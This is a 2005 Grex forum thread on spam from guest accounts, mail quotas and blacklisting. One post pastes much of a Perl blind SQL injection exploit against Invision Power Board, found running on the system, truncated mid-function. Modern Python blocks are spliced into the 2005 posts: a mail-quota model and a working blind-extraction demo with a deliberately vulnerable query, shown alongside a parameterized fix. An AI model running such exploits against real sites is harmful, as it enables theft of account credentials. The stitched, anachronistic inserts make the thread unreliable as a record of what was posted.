Grex > Agora56 > #4: Grex System Problems - Winter 2005/06

bhoward
response 50 of 260:
Dec 30 05:00 UTC 2005
An ascii-art / figlet kind CAPTCHA somehow seems very appropriate
for grex :-)

keesan
response 51 of 260:
Dec 30 05:33 UTC 2005
What size quota? I just sent out (not from grex this time because I don't
want anyone replying here because it is unreliable) the same little mail to
about 40 people (happy new year). How many copies do spammers send?

tsty
response 52 of 260:
Dec 30 06:24 UTC 2005
39 ....

gull
response 53 of 260:
Dec 30 07:29 UTC 2005
Exim 4.x has a very sophisticated ACL mechanism. I would bet someone
has implemented outbound quotas in it at some point.
The ASCII CAPTCHA idea is a pretty good one, too. :)

bhoward
response 54 of 260:
Dec 30 08:39 UTC 2005
Sindi, what often happens is that someone will come in from AOL,
create a batch of accounts, then set each one going mass mailing
anywhere from a few hundred to several thousand different addresses.
I believe on a few occasions, Steve has had to clean up spam
loads on the order of tens of thousands.

I'm sure you are right, David. I just don't know much about exim
yet (I run postfix for my family ISP)...but I expect I will be
learning a bit more as I wade into this.

rcurl
response 55 of 260:
Dec 30 16:29 UTC 2005
What do spammers give typically as a *return* address when they spam from
Grex?

aruba
response 56 of 260:
Dec 30 17:57 UTC 2005
I think the return address on most spam is a fake email address, or a stolen
one. Spammers expect you to respond by going to their website, not by
replying to their email.

gull
response 57 of 260:
Dec 30 20:10 UTC 2005
Re resp:54: The Exim email list is extremely helpful. There's also a
package of sample configurations that has a lot of useful stuff in it.

keesan
response 58 of 260:
Dec 30 20:16 UTC 2005
Can you limit outgoing mails to 25 or 50 addresses per mailing, and 100 mails
per day, or 1MB per day? Or even limit to 10 and 25, with exceptions for
members?
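The numbers proposed above, modelled as a policy: this is an added example for this thread, not Grex's configuration and not Exim code. In Exim 4 the same policy would be expressed with the ratelimit ACL condition keyed on the submitting user; the Python below only shows the decision logic (a recipient cap per message, a rolling 24-hour message count, and a looser tier for members) run over a constructed submission log. The member limits, the sender names and the log itself are assumptions for the demo.

```python
from collections import defaultdict, deque

DAY = 86_400  # seconds in the rolling window

# Guest limits are the ones proposed in the thread (25 addresses per message,
# 100 messages per day). The member tier is an assumption for this demo.
LIMITS = {
    "guest":  {"rcpts_per_msg": 25,  "msgs_per_day": 100},
    "member": {"rcpts_per_msg": 500, "msgs_per_day": 1000},
}


class OutboundQuota:
    """Per-sender outbound mail quota over a rolling 24-hour window."""

    def __init__(self, limits=LIMITS):
        self.limits = limits
        # sender -> submission times of messages accepted inside the window
        self.history = defaultdict(deque)

    def submit(self, sender: str, role: str, ts: int, rcpt_count: int) -> str:
        """Decide one submission: 'accept', or a 'reject: ...' / 'defer: ...' reason.
        An oversized recipient list is rejected outright; exhausting the daily
        count only defers, so a legitimate user's mail is retried later rather
        than bounced."""
        lim = self.limits[role]
        if rcpt_count > lim["rcpts_per_msg"]:
            return "reject: too many recipients"
        window = self.history[sender]
        while window and ts - window[0] >= DAY:
            window.popleft()  # expire entries older than one day
        if len(window) >= lim["msgs_per_day"]:
            return "defer: daily message quota reached"
        window.append(ts)
        return "accept"


# Constructed submission log: (sender, role, unix time, recipient count).
# Not real Grex data; it exercises each branch of the policy.
SAMPLE = (
    [("sindi", "member", 0, 40)]                              # one 40-address greeting
    + [("guest17", "guest", 60 * i, 3) for i in range(120)]   # 120 small mails in two hours
    + [("guest42", "guest", 10, 800)]                         # one 800-address blast
    + [("guest17", "guest", DAY + 7200, 3)]                   # next day, window has rolled
)


def run(submissions=SAMPLE) -> dict:
    """Replay submissions in time order; return {(sender, outcome): count}."""
    quota = OutboundQuota()
    tally = defaultdict(int)
    for sender, role, ts, n in sorted(submissions, key=lambda s: s[2]):
        outcome = quota.submit(sender, role, ts, n).split(":")[0]
        tally[(sender, outcome)] += 1
    return dict(tally)


if __name__ == "__main__":
    for key, count in sorted(run().items()):
        print(key, count)
```

The split between reject and defer matters in practice: a deferred message stays in the sender's queue and goes out once the window rolls, which is what you want for a member who simply had a busy day, while a single message to hundreds of addresses from a guest account is the spam pattern described earlier in the thread and gains nothing from being retried.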

tod
response 59 of 260:
Dec 30 21:51 UTC 2005
SQL exploit hackers in action on Grex....
mirror pf 62.33.88.166 4:13PM 4 perl ipb.pl http://forum.unix.kg / 4
!more ~mirror/ipb.pl
#!/usr/bin/perl
## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com /ipb202/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb202/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
use IO::Socket;
if (@ARGV < 4) { &usage; }
$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];
$pass = ($target)?('member_login_key'):('password');
$server =~ s!(http:\/\/)!!;
$request = 'http://';
$request .= $server;
$request .= $path;
$s_num = 1;
$|++;
$n = 0;
print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";
($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]
MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .=chr($i);;
}
$s_num++;
}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
Then under the "Pass nik" directory are a file for ID's and another...
NICE...NOT!
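What the posted script is doing, as an added example (this is neither the RST/GHC code nor anything that ran on Grex): a boolean-blind extraction loop of the same shape, run against a constructed in-memory SQLite table through a deliberately string-concatenated query, next to a parameterized version of that query which gives the loop nothing to work with. The table, the query and the names are assumptions for the demo; the stored value it recovers is md5("password"), the hash shown in the script's own sample output.

```python
import sqlite3

# Constructed sample data: a toy "members" table, not IPB's schema and not Grex data.
# The stored value is md5("password"), as in the posted script's sample run.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
_conn.execute("INSERT INTO members VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99')")
_conn.commit()


def vulnerable_lookup(member_id: str) -> bool:
    """Deliberately vulnerable: the request parameter is pasted into the SQL text,
    so '1 AND <condition>' turns a page that only says found/not found into a
    yes/no oracle on any column of the row."""
    row = _conn.execute("SELECT name FROM members WHERE id=" + member_id).fetchone()
    return row is not None


def safe_lookup(member_id: str) -> bool:
    """Hardened: the parameter is bound, so the whole string is compared to id
    as a value and is never parsed as SQL."""
    row = _conn.execute("SELECT name FROM members WHERE id=?", (member_id,)).fetchone()
    return row is not None


def blind_extract(oracle, member_id: str, column: str = "password",
                  max_len: int = 64) -> tuple[str, int]:
    """Recover members.<column> for member_id one character at a time through a
    boolean oracle. Same idea as the script: narrow each character's code point
    with BETWEEN by binary search, then append it. Returns (value, probes used)."""
    probes = 0

    def holds(cond: str) -> bool:
        nonlocal probes
        probes += 1
        return oracle(f"{member_id} AND {cond}")

    value = ""
    for pos in range(1, max_len + 1):
        if not holds(f"length({column}) >= {pos}"):
            break  # past the end of the value
        lo, hi = 32, 126  # printable ASCII; the script only searched hex digits
        while lo < hi:
            mid = (lo + hi) // 2
            if holds(f"unicode(substr({column},{pos},1)) BETWEEN {lo} AND {mid}"):
                hi = mid
            else:
                lo = mid + 1
        value += chr(lo)
    return value, probes


if __name__ == "__main__":
    print("vulnerable:", blind_extract(vulnerable_lookup, "1"))
    print("parameterized:", blind_extract(safe_lookup, "1"))
```

Against the concatenated query the 32-character hash comes back in a few hundred requests, each of which looks like an ordinary page view with an odd query string; the signature to look for in web logs is a burst of requests to one script whose parameter carries `AND`, `BETWEEN` or `substr`, often URL-encoded twice (the `%2527` trick in the script's header is exactly that). Against the bound-parameter query the very first probe is false and the loop stops with nothing.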

keesan
response 60 of 260:
Dec 30 22:45 UTC 2005
Please translate the previous response.

tod
response 61 of 260:
Dec 30 22:50 UTC 2005
re #60
User "mirror" was running an SQL exploit via lynx and perl against a site in
Kyrgyzstan. The files are in mirror's home directory.

bhoward
response 62 of 260:
Dec 30 23:16 UTC 2005
Mirror is no longer running this exploit.

albaugh
response 63 of 260:
Dec 31 19:11 UTC 2005
Without some kind of control on outbound internet e-mail abuse, grex will soon
be unusable as an e-mail sender. Among other commercial sites, here is a
blacklisting auto reply against grex from AOL:
AOL does not accept e-mail transactions from IP addresses which
generate complaints or transmit unsolicited bulk e-mail.

keesan
response 64 of 260:
Jan 2 02:50 UTC 2006
I am getting a message about the wrong version of some library when I type
bbs but it proceeds anyway. picospan

bhoward
response 65 of 260:
Jan 2 03:37 UTC 2006
Thanks. You can safely ignore this for the time being. It will go away
when picospan is recompiled for the release of OpenBSD now running on grex.

keesan
response 66 of 260:
Jan 2 04:36 UTC 2006
I did not get that message this time.

bhoward
response 67 of 260:
Jan 2 08:57 UTC 2006
Any chance you were running fronttalk this time, instead of picospan?

keesan
response 68 of 260:
Jan 2 16:34 UTC 2006
I typed bbs, as usual. Never got the message until that one time, yesterday.

davel
response 69 of 260:
Jan 2 16:39 UTC 2006
For what it's worth, members of my family are among those who have no other
email access. (This is regarding what cross said, way back.) You might
be surprised at how many users there are in this state.

cross
response 70 of 260:
Jan 2 17:09 UTC 2006
This response has been erased.

keesan
response 71 of 260:
Jan 2 17:16 UTC 2006
I got the warning again about the picospan library. I must simply not be
noticing it the rest of the time.
Can't you just throttle mail usage for non-members instead?

cross
response 72 of 260:
Jan 2 17:21 UTC 2006
This response has been erased.

rcurl
response 73 of 260:
Jan 2 18:39 UTC 2006
What, again, is the point of turning off e-mail use for non-members, even if
there are few dependent upon it (which is yet to be established)? Non-members
are the future life of Grex as that's the group from which members come.
If some misuse is the problem, why should that be the reason to punish others?

cross
response 74 of 260:
Jan 2 19:00 UTC 2006
This response has been erased.